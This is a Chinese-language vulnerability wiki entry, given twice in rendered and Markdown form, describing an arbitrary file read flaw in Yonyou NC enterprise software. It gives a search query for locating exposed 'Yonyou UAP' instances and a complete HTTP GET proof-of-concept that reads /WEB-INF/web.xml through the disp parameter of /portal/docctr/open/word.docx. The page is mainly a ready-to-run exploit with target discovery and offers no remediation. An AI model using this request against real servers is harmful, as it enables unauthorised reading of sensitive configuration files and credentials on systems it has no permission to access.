fofamini-wiki

登录白背景

源码

用友NC word存在任意文件读取漏洞

一、漏洞简介

用友 NC word存在任意文件读取漏洞，可通过该漏洞获取敏感信息。

二、影响版本

用友NC

三、资产测绘

huiter：app.name=="用友 UAP"

登录页面

四、漏洞复现

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=3EFAE3813FC1841BBE27D4962DBE8CE7.server; JSESSIONID=0D4B431EE47FB5194C16D4AAABEC78FF.server
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 22 Nov 2023 01:06:17 GMT
If-None-Match: W/"15377-1700615177018"

原文: https://www.yuque.com/xiaokp7/ocvun2/gvk1kngq1m38kobv

# 用友NC word存在任意文件读取漏洞

# 一、漏洞简介
用友 NC `word`存在任意文件读取漏洞，可通过该漏洞获取敏感信息。

# 二、影响版本

- 用友NC

# 三、资产测绘

- huiter：`app.name=="用友 UAP"`

![image.png](./img/48CLNE5xmbCfTehR/1691729367315-f00b542f-0929-41cc-8671-84149242ffca-891664.png)

- 登录页面

![image.png](./img/48CLNE5xmbCfTehR/1691729393165-7891d318-bbd8-4761-87d4-76fee42778ec-482564.png)

# 四、漏洞复现
```
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=3EFAE3813FC1841BBE27D4962DBE8CE7.server; JSESSIONID=0D4B431EE47FB5194C16D4AAABEC78FF.server
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 22 Nov 2023 01:06:17 GMT
If-None-Match: W/"15377-1700615177018"
```
![image.png](./img/48CLNE5xmbCfTehR/1700662947281-0ed8ec4f-45e1-45fd-99a4-fbb85adbe241-096885.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gvk1kngq1m38kobv>